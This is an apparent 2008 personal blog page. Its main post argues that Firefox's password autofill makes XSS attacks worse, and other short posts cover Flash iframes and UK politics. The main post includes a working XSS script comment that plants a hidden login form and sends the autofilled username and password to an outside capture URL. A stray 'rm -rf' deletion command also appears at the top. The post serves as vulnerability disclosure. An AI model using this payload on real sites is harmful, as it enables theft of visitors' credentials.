Seen moments ago:
rm -rf /usr/lolcat/nginx
That's some serious typo skills - some part of my brain meant to write that. You know that bit in that show where that guy realises he's going insane? I'm that guy.
I am in your Firefox, stealing your Passwords
25th June 2008 at 21:393 comments
The Firefox developers have their security and usability priorities all muddled up. You can't access my self-signed website, but I can steal your passwords without you even knowing. And they think this makes your browser better.
In Firefox 3, they introduced stricter SSL certificate checks that give you an error page that you can't turn off. It's a usability nightmare if it's a site you want to get in to; there are 4 mouse clicks, all over the screen to add the site - amusingly, 5 if you only want to add it temporarily. Reminds me of Vista UAC. Extremely annoying for people who may run several HTTPS sites on a dev machine, or who need to access scripts on specific machines behind a load balanced secure site, for example.
Sacrificing usability for security is something I can forgive, even condone - although I can't see quite what's so bad about the way IE 7 does it, with a big warning saying "Actually, you don't want to open this". However, it's not a sacrifice Firefox wants to make across the board. Look at the password manager.
Just log in once, and whenever you open another page on the site that prompts for your username and password, it'll pre-populate it for you. Handy, eh?
I'm not talking about an autocomplete option when you start typing, like they do in IE; no, it fills it out for you as soon as you open the page. I thought this was new to FF3, but looking back they've been doing it in FF2 too.
Significant usability gain? No. In fact, they've "improved" form detection in FF3 and have made it a usability nightmare. Now it does it anywhere it finds a password field, regardless of context. Imagine a form on a site that prompts you for a password to a different resource; it's now always populated with the wrong password. Or more commonly, imagine a form that lets you change your details, and has a field to change your password if you provide your current one. Click save and *ding*! Error! Or even better, you've now got a blank password (and don't know why you can't log back in). Now they're sacrificing usability for usability!
Bugzilla comments say if you've got a form like that, you should set the autocomplete="no" form attribute. Great, but that's like saying they're now not going to render HTML if it contains presentational markup - I'm screwed on a major proportion of sites I use.
But wait, why am I talking about mere annoyances, when I can be talking about a vulnerability, at least when combined with XSS. Let me show you:
- Log in to a site that doesn't parse user comments properly.
- Leave a new comment:
I LOVE THIS SITE, AAA+++++++=+++!!!1! <script> document.write('<form style="display:none">' + '<input type="text" name="username" id="username">' + '<input type="password" name="password"></form>'); window.onload = function () { (new Image).src = 'http://radiac.net/capture?u=' + document.getElementsByName('username')[0].value + '&p=' + document.getElementsByName('password')[0].value ; } </script> - Profit.
That's just the quick version before we start trying. And the best bit? There are bug reports about this in Bugzilla going back to 2006. The response to that bug was the same as to similar bugs being submitted now:
I don't think we should sacrifice usability this much just to slightly mitigate the effect of a successful XSS attack.
Slightly mitigate the effect? Slightly?! I just stole all your visitors' usernames and passwords!
Other comments say once a site's been injected with malicious code, it's already game over, but this isn't some obscure Quicktime hack that'll only last until the next bug fix - this is an officially sanctioned feature. With this, it doesn't matter if I can't inject code onto the login page to sniff keypresses, or if you do clever stuff with your session cookies to make sure they can't be copied - all I need is one tiny corner of your site, and I have their password. I am now them.
Still, at least they don't have to click two buttons to select their login from the dropdown. I'm sure that'll keep them happy while I'm finding out which other sites I can now access. Please, just let me get one for play.
Flash, Iframes and IE
15th June 2008 at 09:501 comment
Here's another fun little flash/ie fact: putting a 1x1 swf inside a 1x1 iframe fails in IE, at least if you want to use ExternalInterface. It seems that the iframe has to be 18px by 18px - and Google and I have no idea why. Any suggestions?
Sun's out, trains off
14th June 2008 at 17:50Comment
Has anyone else noticed how the RMT only ever strikes when it's sunny?
Let's move!
12th June 2008 at 17:555 comments
I don't regularly comment on matters of politics, but I shall today. For some reason I was surprised when I heard that the 42 day detention bill had passed in the commons. Diane Abbott's speech is a perfect example of why it should have failed - you know something's up when a Labour MP stands with senior ministers from the tories and lib dems in saying the security services don't need it, that the similar legislation was already defeated two years ago and that it's just about strengthening the PM's position. I couldn't see how people could have listened to that and the rest of the debate, and still voted aye. I naively couldn't see how it would pass.
Of course, I missed the real point - it's pure politics at its worst. Brown wanted to show he was tough and able to succeed where Blair failed. If Brown had lost, he could have been days away from a challenge, and the rumours of promises of safe seats and knighthoods to increase the ayes don't do anything to suggest otherwise. Blair was dangerous, but Brown is both dangerous and incompetent. A heady mix.
So, while there may well be more to it than meets the eye, taking David Davis' resignation speech at face value gives me just the tiniest glimmer of hope that the madness in politics in this country hasn't reached the point of no return.
Of course, all his re-election will achieve is a bit of extra publicity and another nail in Brown's coffin, but no real change. That's the problem with politics in the UK - we the voters are damned if we do, damned if we don't.
But then perhaps I give too much credit to the public common sense. Top-watched video on the BBC is "Colleen parties before wedding" - they just don't care, because it doesn't affect them, yet.
Time to move out. Can anyone recommend a nice country that speaks english but respects their citizens?